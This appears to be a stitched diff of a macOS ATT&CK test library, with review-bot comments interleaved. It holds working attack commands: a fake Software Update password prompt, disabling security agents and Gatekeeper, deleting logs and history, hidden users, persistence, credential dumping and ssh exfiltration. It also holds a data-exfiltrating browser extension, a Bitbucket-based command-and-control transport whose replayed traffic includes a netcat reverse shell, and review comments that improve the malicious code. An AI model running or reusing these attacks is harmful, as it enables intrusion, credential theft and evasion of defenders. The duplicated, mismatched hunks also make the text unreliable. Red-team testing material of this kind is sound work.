| | | [Timestomp](Defense_Evasion/Timestomp.md) | | | | | | | Standard Non-Application Layer Protocol |
| | | Valid Accounts | | | | | | | Uncommonly Used Port |
| | | | | | | | | | Web Service |
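Review bot: The `Redundant Access` row of the Defense Evasion column is truncated to three cells, so it no longer spans the ten-column header; the old matrix carried `Remote File Copy` in that row's Command and Control cell, and after the Rootkits row was inserted the trailing cells were dropped instead of shifted. Pad the row to the full width, `| | | Redundant Access | | | | | | | |`, so renderers that reject ragged rows still show the table. The Browser Extensions link in the Persistence column also runs its cell straight into the `|` separator without a space, unlike every other cell.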
+24
@@ -0,0 +1,24 @@
## Browser Extensions
MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
### Chrome (Developer Mode)
Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
Then click 'Select'
### Chrome (Chrome Web Store)
Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome'
### Firefox
Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json)
Then click 'Open'
+18
@@ -0,0 +1,18 @@
## Screen Capture
MITRE ATT&CK Technique: [T1113](https://attack.mitre.org/wiki/Technique/T1113)
Input:
log show --debug | grep "GENERATED_NEW_IMAGE" | awk '{print $1,$2,$11,$27}'
For list of times a screenshot was generated and extension used
Input:
log show --debug | grep "GENERATED_NEW_IMAGE" | awk '{print $1,$2,$11,$27}' | wc -l
For number count of total images created
@@ -0,0 +1,43 @@
# Custom Command and Control Protocol
MITRE ATT&CK Technique: [T1146](https://attack.mitre.org/wiki/Technique/T1094)
## Communication over Bitbucket Snippets
The use of a legitimate service as transport is a common technique to evade detection by masquerading as the legitimate service.
Below are instructions to run a script to simulate traffic from a malware implant that communicates via a custom protocol implemented in [Bitbucket Snippets](https://confluence.atlassian.com/bitbucket/snippets-719095082.html).
The malware itself isn't included, just the traffic simulation.
### Installation
#### Step 1: Create a new Bitbucket account
We recommend using a fresh account for this so as not to pollute the snippets of your existing account.
https://bitbucket.org/account/signup/
#### Step 2: Include its credentials in `auth.json`
In the directory [Payloads/Custom_Command_and_Control_Protocol_Bitbucket_Snippets](Payloads/Custom_Command_and_Control_Protocol_Bitbucket_Snippets):
```
cp auth.json.template auth.json
```
Edit `auth.json` to include the username, email, and password of the Bitbucket account. `auth.json` should not be added to version control.
### Step 3: Install dependencies
```
pip install -r requirements.txt
```
### Usage
To simulate the network traffic, run:
```
python replay.py
```
You will need to be using Python 3.
This will make requests to `bitbucket.org` urls, recorded from an interactive session with the malware.
The session recording of the malware is available to view and modify at [traffic_history.json](bitbucket_protocol/traffic_history.json)
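Review bot: The technique line reads `MITRE ATT&CK Technique: [T1146](https://attack.mitre.org/wiki/Technique/T1094)` — the link text and URL disagree, and T1146 is Clear Command History while the file and URL describe Custom Command and Control Protocol; the text should be `[T1094]`. The `traffic_history.json` link points at `bitbucket_protocol/traffic_history.json`, which does not match the `Payloads/Custom_Command_and_Control_Protocol_Bitbucket_Snippets` directory named in Step 2, so one of the two paths is probably wrong. Since `auth.json` holds a real account password, the note that it must stay out of version control would be stronger as an explicit instruction to add it to the repository's ignore list.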
@@ -0,0 +1,11 @@
# Credentials in Files
MITRE ATT&CK Technique: [T1081](https://attack.mitre.org/wiki/Technique/T1081)
## Browser and System credentials
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
Input:
python2 laZagne.py all
+12
@@ -0,0 +1,12 @@
# Input Prompt
MITRE ATT&CK Technique: [T1141](https://attack.mitre.org/wiki/Technique/T1141)
### Prompt User for Password (Local Phishing)
osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'
Reference:
http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
+32
@@ -0,0 +1,32 @@
# Keychain
MITRE ATT&CK Technique: [T1142](https://attack.mitre.org/wiki/Technique/T1142)
### Keychain Files
~/Library/Keychains/
/Library/Keychains/
/Network/Library/Keychains/
### security command line
Input:
security -h
Input:
security find-certificate -a -p > allcerts.pem
Input:
security import /tmp/certs.pem -k
### References
[Security Reference](https://developer.apple.com/legacy/library/documentation/Darwin/Reference/ManPages/man1/security.1.html)
[Keychain dumper](https://github.com/juuso/keychaindump)
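Review bot: `security import /tmp/certs.pem -k` ends with a bare `-k`, which expects a keychain path as its argument; as written the command errors out rather than importing anything. Either supply the target, e.g. `security import /tmp/certs.pem -k ~/Library/Keychains/login.keychain-db`, or drop `-k` to import into the default keychain. The file should also say that `/tmp/certs.pem` is produced by the preceding `find-certificate` step (which writes `allcerts.pem`, a different name) or is a placeholder the tester must create.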
@@ -0,0 +1,18 @@
# Clear Command History
MITRE ATT&CK Technique: [T1146](https://attack.mitre.org/wiki/Technique/T1146)
## multiple shells
unset HISTFILE
export HISTFILESIZE=0
history -c
## bash
rm ~/.bash_history
cat /dev/null > ~/.bash_history
@@ -0,0 +1,15 @@
# Disabling Security Tools
MITRE ATT&CK Technique: [T1089](https://attack.mitre.org/wiki/Technique/T1089)
## Disabling By Tool:
### Carbon Black Response
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
### LittleSnitch
sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
### OpenDNS Umbrella
sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
+8
@@ -0,0 +1,8 @@
# Gatekeeper Bypass
MITRE ATT&CK Technique: [T1144](https://attack.mitre.org/wiki/Technique/T1144)
sudo xattr -r -d com.apple.quarantine /path/to/MyApp.app
sudo spctl --master-disable
+15
@@ -0,0 +1,15 @@
# HISTCONTROL
MITRE ATT&CK Technique: [T1148](https://attack.mitre.org/wiki/Technique/T1148)
### Set the environment variable
export HISTCONTROL=ignoreboth
OR
echo export "HISTCONTROL=ignoreboth" >> ~/.bash_profile
### Preface commands with a space to exclude them from .bash_history
ls
whoami > recon.txt
@@ -0,0 +1,6 @@
# Hidden Files and Directories
MITRE ATT&CK Technique: [T1158](https://attack.mitre.org/wiki/Technique/T1158)
sudo xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF FF 00 00"
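Review bot: The redirection `2>&1 /dev/null` does not discard stderr — it duplicates stderr onto stdout and then passes `/dev/null` to xattr as one more path argument — so the grep sees every permission-denied message and xattr also walks `/dev/null`. The intended form is `sudo xattr -lr * / 2>/dev/null | grep -C 2 "..."`. A sentence on what the `00 00 ... 40 00 FF FF FF FF 00 00` byte pattern represents would also help readers understand what a match means.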
+6
@@ -0,0 +1,6 @@
# Hidden Users
MITRE ATT&CK Technique: [T1147](https://attack.mitre.org/wiki/Technique/T1147)
sudo dscl . -create /Users/APT UniqueID 333
@@ -0,0 +1,9 @@
# Indicator Removal on Host
MITRE ATT&CK Technique: [T1070](https://attack.mitre.org/wiki/Technique/T1070)
### Delete System Logs
rm -rf /private/var/log/system.log*
### Delete BSM Audit Logs
rm -rf /private/var/audit/*
+6
@@ -0,0 +1,6 @@
# Launchctl
MITRE ATT&CK Technique: [T1152](https://attack.mitre.org/wiki/Technique/T1152)
launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
@@ -0,0 +1,12 @@
# Space After Filename
MITRE ATT&CK Technique: [T1151](https://attack.mitre.org/wiki/Technique/T1151)
### Generate Binary
echo '#!/bin/bash\necho "print \"hello, world!\"" | /usr/bin/python\nexit' > execute.txt && chmod +x execute.txt
### Add Space After Filename
mv execute.txt "execute.txt "
### Execute
./execute.txt\
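Review bot: The Generate Binary step relies on `echo` expanding `\n` inside single quotes, which the bash builtin does not do by default, so on bash the three lines are written as one literal line with backslash-n sequences and the script fails to run; `printf '#!/bin/bash\necho "print \"hello, world!\"" | /usr/bin/python\nexit\n' > execute.txt` behaves the same on every shell. The final `./execute.txt\` line appears here without the trailing space the backslash is meant to escape — if that is how the file was committed, the command cannot find the renamed file. The same text is duplicated in the macOS Execution copy of Space After Filename in this change.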
+33
@@ -0,0 +1,33 @@
## Account Discovery
MITRE ATT&CK Technique: [T1087](https://attack.mitre.org/wiki/Technique/T1087)
### Enumerate Groups and users
Input:
groups
Input:
id
Input:
dscl . list /Groups
Input:
dscl . list /Users
Input:
dscl . list /Users | grep -v '_'
Input:
dscacheutil -q group
Input:
dscacheutil -q user
@@ -0,0 +1,34 @@
## File and Directory Discovery
MITRE ATT&CK Technique: [T1083](https://attack.mitre.org/wiki/Technique/T1083)
### File and Directory Discovery
Input:
ls -a > allcontents.txt
Input:
ls -la /Library/Preferences/ > detailedprefsinfo.txt
Input:
file */* *>> ../files.txt
Input:
find . -type f
Input:
ls -R | grep ":$" | sed -e 's/:$//' -e 's/[^-][^\/]*\//--/g' -e 's/^/ /' -e 's/-/|/'
References:
http://osxdaily.com/2013/01/29/list-all-files-subdirectory-contents-recursively/
https://perishablepress.com/list-files-folders-recursively-terminal/
@@ -0,0 +1,9 @@
## Network Service Scanning
MITRE ATT&CK Technique: [T1046](https://attack.mitre.org/wiki/Technique/T1046)
### Bash One Liner
Input:
for port in {1..65535}; do echo >/dev/tcp/192.168.1.1/$port && echo "port $port is open" || echo "port $port is closed" : ; done
+18
@@ -0,0 +1,18 @@
## Network Share Discovery
MITRE ATT&CK Technique: [T1135](https://attack.mitre.org/wiki/Technique/T1135)
### Local Mounts
Input:
df -aH
### Remote Find Mounts
smbutil view -g //<hostname>
### NFS Show mounts
showmount hostname
@@ -0,0 +1,20 @@
## Permission Groups Discovery
MITRE ATT&CK Technique: [T1069](https://attack.mitre.org/wiki/Technique/T1069)
### Domain
Input:
dscacheutil -q group
### Local
Input:
dscl . -list /Groups
Input:
groups
+14
@@ -0,0 +1,14 @@
## Process Discovery
MITRE ATT&CK Technique: [T1057](https://attack.mitre.org/wiki/Technique/T1057)
### Process Discovery
Input:
ps >> /tmp/loot.txt
Input:
ps aux >> /tmp/loot.txt
+18
@@ -0,0 +1,18 @@
## Remote System Discovery
MITRE ATT&CK Technique: [T1018](https://attack.mitre.org/wiki/Technique/T1018)
### arp
Input:
arp -a | grep -v '^?'
### Network scanning
Input:
for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip -o; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done
@@ -0,0 +1,12 @@
# Security Software Discovery
MITRE ATT&CK Technique: [T1063](https://attack.mitre.org/wiki/Technique/T1063)
### LittleSnitch
ps -ef | grep Little\ Snitch | grep -v grep
### CarbonBlack Response
ps aux | grep CbOsxSensorService
@@ -0,0 +1,18 @@
## System Information Discovery
MITRE ATT&CK Technique: [T1082](https://attack.mitre.org/wiki/Technique/T1082)
### System Information
Input:
systemsetup
Input:
system_profiler
Input:
ls -al /Applications
@@ -0,0 +1,17 @@
## System Network Configuration Discovery
MITRE ATT&CK Technique: [T1016](https://attack.mitre.org/wiki/Technique/T1016)
### Network Data
Input:
arp -a
Input:
netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c
Input:
ifconfig
@@ -0,0 +1,16 @@
## System Owner/User Discovery
MITRE ATT&CK Technique: [T1033](https://attack.mitre.org/wiki/Technique/T1033)
Input:
Users
Input:
w
Input:
who
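Review bot: The first command is given as `Users`, but the utility is `users`; this only happens to work on macOS because the default filesystem is case-insensitive, and it will not run on a case-sensitive volume or on Linux. Change the line to `users` to match the lowercase `w` and `who` that follow.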
-7
@@ -9,10 +9,3 @@ MITRE ATT&CK Technique: [T1155](https://attack.mitre.org/wiki/Technique/T1155)
osascript "do shell script "echo \"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('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'));\" | python &""
https://github.com/EmpireProject/Empire
### Prompt User for Password (Local Phishing)
osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'
http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
+12
@@ -0,0 +1,12 @@
# Space After Filename
MITRE ATT&CK Technique: [T1151](https://attack.mitre.org/wiki/Technique/T1151)
### Generate Binary
echo '#!/bin/bash\necho "print \"hello, world!\"" | /usr/bin/python\nexit' > execute.txt && chmod +x execute.txt
### Add Space After Filename
mv execute.txt "execute.txt "
### Execute
./execute.txt\
@@ -0,0 +1,14 @@
## Exfiltration Over Alternative Protocol
MITRE ATT&CK Technique: [T1048](https://attack.mitre.org/wiki/Technique/T1048)
### SSH
Remote to Local:
ssh target.example.com "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
Local to Remote:
tar czpf - /Users/* | openssl des3 -salt -pass pass:1234 | ssh foo@example.com 'cat > /Users.tar.gz.enc'
-26
@@ -1,26 +0,0 @@
## MITRE ATT&CK Matrix - Mac
| Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control |
|------------------------------|-------------------------------|-------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------|
| .bash_profile and .bashrc | Dylib Hijacking | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | Account Discovery | [AppleScript](Execution/AppleScript.md) | [AppleScript](Execution/AppleScript.md) | Automated Collection | Automated Exfiltration | Commonly Used Port |
| [Cron Job](Persistence/Cron_Job.md) | Exploitation of Vulnerability | Clear Command History | Brute Force | Application Window Discovery | Application Deployment Software | Command-Line Interface | Clipboard Data | Data Compressed | Communication Through Removable Media |
| Dylib Hijacking | Launch Daemon | Code Signing | Create Account | File and Directory Discovery | Exploitation of Vulnerability | Graphical User Interface | Data Staged | Data Encrypted | Connection Proxy |
| Hidden Files and Directories | Plist Modification | Disabling Security Tools | Credentials in Files | Network Share Discovery | Logon Scripts | Launchctl | Data from Local System | Data Transfer Size Limits | Custom Command and Control Protocol |
| LC_LOAD_DYLIB Addition | Setuid and Setgid | Exploitation of Vulnerability | Exploitation of Vulnerability | Permission Groups Discovery | Remote File Copy | Scripting | Data from Network Shared Drive | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol |
| Launch Agent | Startup Items | File Deletion | Input Capture | Process Discovery | Remote Services | Source | Data from Removable Media | Exfiltration Over Command and Control Channel | Data Encoding |
| Launch Daemon | Sudo | Gatekeeper Bypass | Input Prompt | Remote System Discovery | Third-party Software | Space after Filename | Input Capture | Exfiltration Over Other Network Medium | Data Obfuscation |
| Launchctl | Valid Accounts | HISTCONTROL | Keychain | Security Software Discovery | | Third-party Software | Screen Capture | Exfiltration Over Physical Medium | Fallback Channels |
| Login Item | Web Shell | Hidden Files and Directories | Network Sniffing | System Information Discovery | | Trap | | Scheduled Transfer | Multi-Stage Channels |
| Logon Scripts | | Hidden Users | Private Keys | System Network Configuration Discovery | | | | | Multiband Communication |
| Plist Modification | | Hidden Window | Securityd Memory | System Network Connections Discovery | | | | | Multilayer Encryption |
| Rc.common | | Indicator Removal from Tools | Two-Factor Authentication Interception | System Owner/User Discovery | | | | | Remote File Copy |
| Re-opened Applications | | Indicator Removal on Host | | | | | | | Standard Application Layer Protocol |
| Redundant Access | | LC_MAIN Hijacking | | | | | | | Standard Cryptographic Protocol |
| Startup Items | | Launchctl | | | | | | | Standard Non-Application Layer Protocol |
| Trap | | Masquerading | | | | | | | Uncommonly Used Port |
| Valid Accounts | | Plist Modification | | | | | | | Web Service |
| Web Shell | | Redundant Access | | | | | | | |
| | | Scripting | | | | | | | |
| | | Space after Filename | | | | | | | |
| | | Valid Accounts | | | | | | | |
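--- /dev/null
+++ b/UNKNOWN_PATH
@@ -0,0 +1,37 @@
+function exfil(str) {
+// take the provided string, SHA-256 hash it, then call an attacker-controlled URL with the hash included.
+// other options, if you could be bothered writing them, involve dns resolution of sha256(string).attackerdomain.com
+// and probably a thousand other methods. But this one is easy.
+var buffer = new TextEncoder("utf-8").encode(str);
+return crypto.subtle.digest("SHA-256", buffer).then(callUrl);
+}
+function callUrl(buffer) {
+// this function "exfiltrates" data by making a (404-returning) call to a webserver the attacker controls
+// except it's example.com so w/e
+var digest = hex(buffer);
+var url = "https://example.com/" + digest;
+console.log("Exfiltrating data to " + url)
+var xmlHttp = new XMLHttpRequest();
+xmlHttp.open( "GET", url, true);
+xmlHttp.send( null);
+return digest;
+}
+function hex(buffer) {
+// nicked from https://developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/digest
+var hexCodes = [];
+var view = new DataView(buffer);
+for (var i = 0; i < view.byteLength; i += 4) {
+var value = view.getUint32(i)
+var stringValue = value.toString(16)
+var padding = '00000000'
+var paddedValue = (padding + stringValue).slice(-padding.length)
+hexCodes.push(paddedValue);
+}
+var athing = hexCodes.join("");
+return hexCodes.join("");
+}
+// Obviously a really malicious extension would exfil more interesting stuff than the document title but we're MVP here.
+var digest = exfil(document.title);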
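Review bot: `hex()` joins `hexCodes` twice: `athing` on the line before the return is assigned and never read, so that line should go and `return hexCodes.join("");` stand alone. In `callUrl` the `XMLHttpRequest` is sent with no `onloadend`/`onerror` handler, so a blocked, failed or 404 request leaves no trace beyond the "Exfiltrating data to" line; for a test payload whose point is to be observable, logging the outcome, e.g. `xmlHttp.onloadend = function () { console.log("status " + xmlHttp.status); };` before `send`, makes the result visible in the console. The `"utf-8"` argument to `TextEncoder` is a no-op (the constructor only produces UTF-8) and can be dropped.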
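--- /dev/null
+++ b/UNKNOWN_PATH
@@ -0,0 +1,16 @@
+{
+"name": "Minimum Viable Malicious Extension",
+"description": "Base Level Extension",
+"version": "1.0",
+"manifest_version": 2,
+"content_scripts": [
+{
+"matches": [
+"<all_urls>"
+],
+"js": [
+"inline.js"
+]
+}
+]
+}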
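--- /dev/null
+++ b/UNKNOWN_PATH
@@ -0,0 +1,5 @@
+{
+"username": "",
+"email": "",
+"password": ""
+}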
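Review bot: A committed credentials file with empty `username`/`email`/`password` fields that the transport loads verbatim invites a user to fill in real Bitbucket credentials in place and then commit them. Ship this as a template (e.g. `auth.json.example`) and keep the populated `auth.json` out of version control, with a README line telling the user to copy and fill it. It is worth saying in that README line that the transport authenticates with the account password over HTTP basic auth, so the filled-in file has the same sensitivity as the password itself.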
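--- /dev/null
+++ b/UNKNOWN_PATH
@@ -0,0 +1,191 @@
+import datetime
+import requests
+import json
+import functools
+class BitbucketTransport():
+"""Send and recieve arbitrary data to a queue implemented in Bitbucket Snippets.
+https://confluence.atlassian.com/bitbucket/snippets-719095082.html
+"""
+TITLE_TEMPLATE = "stacktrace|{time}"
+SNIPPET_FILE_NAME = "debug.log"
+def __init__(self):
+with open("auth.json") as f:
+auth = json.load(f)
+self.email = auth["email"]
+self.password = auth["password"]
+self.username = auth["username"]
+self.BASE_URL = "https://api.bitbucket.org/"
+self.auth = (self.email, self.password)
+self.history = []
+def push(self, data):
+"""Add something to the end of the queue
+Snippets looks like this:
+push() -> [4, 3, 2, 1, 0 ...] -> pop()
+The numbers indicate in which order items were added to the queue.
+0 was added first, 4 last.
+"""
+self.history.append({
+"history_type": "push",
+"data": data
+})
+# Imitate a stack trace to avoid rasing suspicion.
+metadata = {
+"title": self.TITLE_TEMPLATE.format(
+time=datetime.datetime.utcnow().strftime('%b-%d-%I%M%p-%G')),
+"is_private": True,
+}
+# Send the file as a POST request of raw text, not an actual HTTP multipart file.
+files = {
+"file": (self.SNIPPET_FILE_NAME, data)
+}
+res = self._api_post(data=metadata, files=files)
+return res
+def pop(self):
+"""Remove and return the oldest item in the queue.
+Snippets looks like this:
+push() -> [4, 3, 2, 1, 0 ...] -> pop()
+The numbers indicate in which order items were added to the queue.
+0 was added first, 4 last.
+"""
+snips = self.get_all_snippets()
+if not snips:
+return None
+# Get the oldest snippet
+snip = snips[0]
+# Delete it
+snip_content = self.get_content(snip)
+self.delete_snip(snip["id"])
+self.history.append({
+"history_type": "pop",
+"data": snip_content
+})
+return snip_content
+def peek(self):
+"""Return the oldest item in the queue.
+Snippets looks like this:
+push() -> [4, 3, 2, 1, 0 ...] -> pop()
+The numbers indicate in which order items were added to the queue.
+0 was added first, 4 last.
+"""
+snips = self.get_all_snippets()
+if not snips:
+return None
+# Get the oldest snippet
+snip = snips[0]
+snip_content = self.get_content(snip)
+self.history.append({
+"history_type": "peek",
+"data": snip_content
+})
+return snip_content
+def search_filter(self, filter_, pop=False):
+"""Find the first snippet that matches the provided filter.
+Args:
+filter_: Function that returns True for the snippets we want to match.
+Returns:
+The first matching snippet (as a string).
+"""
+snips = self.get_all_snippets()
+if not snips:
+return None
+# Walk the front of the queue until we find the oldest item meant for us.
+for snip in snips:
+snip_content = self.get_content(snip)
+if filter_(snip_content):
+# We can only pop if we found something.
+if pop:
+self.delete_snip(snip["id"])
+return snip_content
+return None
+def pop_filter(self, filter_):
+return self.search_filter(filter_=filter_, pop=True)
+def peek_filter(self, filter_):
+return self.search_filter(filter_=filter_, pop=False)
+def delete_snip(self, snip_id):
+delete_url = "https://bitbucket.org/api/2.0/snippets/" + \
+self.username + "/" + snip_id
+requests.delete(delete_url, auth=self.auth)
+def get_content(self, snip):
+"""Returns the raw text in a snippet object.
+Args:
+snip: Dict of snippet metadata from the Bitbucket snippets API
+Returns:
+str: The raw snippet text.
+"""
+url = "/".join(snip["links"]["diff"]["href"].split("/")[:-1])
+res = self._get_snip_content(url)
+if res.status_code == 404:
+# The snippet might have been deleted since we got its id, so we can ignore this.
+return res.text
+res.raise_for_status()
+return res.text
+@functools.lru_cache(maxsize=5)
+def _get_snip_content(self, url):
+"""Split out the network request part so we can cache it."""
+res = requests.get(url + "/files/(unknown)".format(filename=self.SNIPPET_FILE_NAME),
+auth=self.auth)
+return res
+def _api_get(self, *args, **kwargs):
+return requests.get(self.BASE_URL + "/2.0/snippets?role=owner",
+auth=(self.email, self.password),
+*args, **kwargs)
+def _api_post(self, *args, **kwargs):
+return requests.post(self.BASE_URL + "/2.0/snippets",
+auth=(self.email, self.password),
+*args, **kwargs)
+def get_all_snippets(self):
+"""Return all snippets in this Bitbucket account."""
+res = self._api_get()
+res.raise_for_status()
+res = res.json()
+# No pagination
+if "next" not in res:
+return res["values"]
+snippets = []
+while True:
+# Extract the current list of snippets
+for snip in res["values"]:
+snippets.append(snip)
+if "next" in res:
+# Get the next page
+res = requests.get(res["next"], auth=self.auth)
+res.raise_for_status()
+res = res.json()
+else:
+return snippets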
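Review bot: `delete_snip` discards the response of `requests.delete`, so a failed deletion (auth error, rate limit, snippet already gone) is never noticed and the item that `pop` and `pop_filter` report as removed stays at the head of the queue; every other call in the class checks its response, so this one should read `requests.delete(delete_url, auth=self.auth).raise_for_status()`. `get_content` treats a 404 as success and returns the error body as if it were snippet text, and because `_get_snip_content` is wrapped in `functools.lru_cache` that 404 `Response` is also served for later lookups of the same URL, so returning `None` on 404 (and letting callers skip it) would be safer than handing back `res.text`. URL construction is inconsistent: `BASE_URL` ends in `/` while `_api_get`/`_api_post` prepend `/2.0/...`, producing `api.bitbucket.org//2.0/snippets`, and `delete_snip` hardcodes a different host prefix instead of using `BASE_URL`. The `"/files/(unknown)".format(filename=...)` call in `_get_snip_content` has no `{filename}` placeholder for its keyword argument, though that may be an artefact of how this page was captured. The docstrings also carry the typos `recieve` and `rasing`.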
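--- /dev/null
+++ b/UNKNOWN_PATH
@@ -0,0 +1,18 @@
+"""Replay captured traffic from malware using Bitbucket snippets as a C2."""
+import json
+import bitbucket_transport
+transport = bitbucket_transport.BitbucketTransport()
+with open("traffic_history.json") as f:
+history = json.load(f)
+for event in history:
+print(event)
+if event.get("history_type") == "push":
+data = event["data"]
+transport.push(data)
+elif event.get("history_type") == "pop":
+result = transport.pop()
+if event.get("history_type") == "peek":
+result = transport.peek()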
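Review bot: The last branch of the event dispatch uses `if` where the two before it use `elif`, so it reads as a second, independent decision and re-evaluates `event.get("history_type")` for every event; it should be `elif event.get("history_type") == "peek":`. `result` is assigned in both the pop and peek branches but never read, so either print it next to `event` (which would make the replay's effect on the live account visible) or drop the assignment. Since the module runs the replay at import time, wrapping the body in `if __name__ == "__main__":` would let `bitbucket_transport` consumers import it without triggering network traffic.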
@@ -0,0 +1,73 @@
[
{
"history_type": "peek"
},
{
"history_type": "peek"
},
{
"history_type": "peek"
},
{
"history_type": "pop"
},
{
"history_type": "push",
"data": "{\"type\": \"result\", \"executed_cmd\": \"pwd\", \"result\": \"/home/username/.config/t/\\n\", \"client_id\": \"username29f7293d719c414df8cae1c02564b5aa4a026783\"}"
},
{
"history_type": "peek"
},
{
"history_type": "peek"
},
{
"history_type": "pop"
},
{
"history_type": "push",
"data": "{\"type\": \"result\", \"executed_cmd\": \"whoami\", \"result\": \"username\\n\", \"client_id\": \"username29f7293d719c414df8cae1c02564b5aa4a026783\"}"
},
{
"history_type": "peek"
},
{
"history_type": "pop"
},
{
"history_type": "push",
"data": "{\"type\": \"result\", \"executed_cmd\": \"ls .ssh\", \"result\": \"Command 'ls .ssh' returned non-zero exit status 2.\", \"client_id\": \"username29f7293d719c414df8cae1c02564b5aa4a026783\"}"
},
{
"history_type": "peek"
},
{
"history_type": "pop"
},
{
"history_type": "push",
"data": "{\"type\": \"result\", \"executed_cmd\": \"ls ~/.ssh\", \"result\": \"username-test.pem\\nconfig\\nconfig~\\nid_rsa\\nid_rsa.pub\\nknown_hosts\\nprivate_key.key\\nvagrant\\n\", \"client_id\": \"username29f7293d719c414df8cae1c02564b5aa4a026783\"}"
},
{
"history_type": "peek"
},
{
"history_type": "pop"
},
{
"history_type": "push",
"data": "{\"type\": \"result\", \"executed_cmd\": \"nc 192.168.100.113 -e /bin/bash\", \"result\": \"Command 'nc 192.168.100.113 -e /bin/bash' returned non-zero exit status 1.\", \"client_id\": \"username29f7293d719c414df8cae1c02564b5aa4a026783\"}"
},
{
"history_type": "peek"
},
{
"history_type": "peek"
},
{
"history_type": "peek"
},
{
"history_type": "peek"
}
]
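--- /dev/null
+++ b/UNKNOWN_PATH
@@ -0,0 +1,9 @@
+#import <stdio.h>
+#import <unistd.h>
+int main()
+{
+printf("Hello\n");
+sleep(60);
+printf("Don't run random binaries!\n");
+return 0;
+}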
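Review bot: `#import` is a GCC/clang extension intended for Objective-C headers and draws a warning in plain C; the two directives should be `#include <stdio.h>` and `#include <unistd.h>` so the file builds cleanly with any C compiler. `int main()` is better written `int main(void)` so the definition declares that it takes no parameters. A one-line comment at the top saying the binary only prints, sleeps for a minute and prints again would tell a reader what this payload is meant to demonstrate without running it.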
+24
@@ -0,0 +1,24 @@
## Browser Extensions
MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
### Chrome (Developer Mode)
Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
Then click 'Select'
### Chrome (Chrome Web Store)
Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome'
### Firefox
Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json)
Then click 'Open'
+15
@@ -0,0 +1,15 @@
# Create Account
MITRE ATT&CK Technique: [T1136](https://attack.mitre.org/wiki/Technique/T1136)
### dscl - add user
Input:
dscl . -create /User/AtomicRedTeam
###
Input:
/usr/sbin/sysadminctl -addUser AtomicRedTeam
-6
@@ -1,6 +0,0 @@
# Bash History
MITRE ATT&CK Technique: [T1168](https://attack.mitre.org/wiki/Technique/T1168)
echo "* * * * * /tmp/evil.sh" > /tmp/persistevil && crontab /tmp/persistevil
@@ -0,0 +1,34 @@
# Hidden Files and Directories
MITRE ATT&CK Technique: [T1158](https://attack.mitre.org/wiki/Technique/T1158)
### Hide files
Input:
mv filename .filename
Input:
(Requires Apple Dev Tools)
setfile -a V filename
### Hide Directories
Input:
chflags hidden /secret/dir
Unhide:
chflags nohidden
### Show all Hidden
Execute within terminal:
defaults write com.apple.finder AppleShowAllFiles YES
+38
@@ -0,0 +1,38 @@
# Launch Agent
MITRE ATT&CK Technique: [T1159](https://attack.mitre.org/wiki/Technique/T1159)
Input:
Filename: .client
(Place within any directory, it will need to be referenced in the plist)
osascript -e 'tell app "Finder" to display dialog "Hello World"'
Place the following in a new file under ~/Library/LaunchAgents as com.atomicredteam.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>KeepAlive</key>
<true/>
<key>Label</key>
<string>com.client.client</string>
<key>ProgramArguments</key>
<array>
<string>/Users/<update path to .clent file>/.client</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>NSUIElement</key>
<string>1</string>
</dict>
</plist>
Launch:
launchctl load -w ~/Library/LaunchAgents/com.atomicredteam.plist
+23
@@ -0,0 +1,23 @@
# Launch Daemon
MITRE ATT&CK Technique: [T1160](https://attack.mitre.org/wiki/Technique/T1160)
Place the following file (com.example.hello) in /System/Library/LaunchDaemons or /Library/LaunchDaemons
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.example.hello</string>
<key>ProgramArguments</key>
<array>
<string>hello</string>
<string>world</string>
</array>
<key>KeepAlive</key>
<true/>
</dict>
</plist>
+49
@@ -0,0 +1,49 @@
# Local Job Scheduling
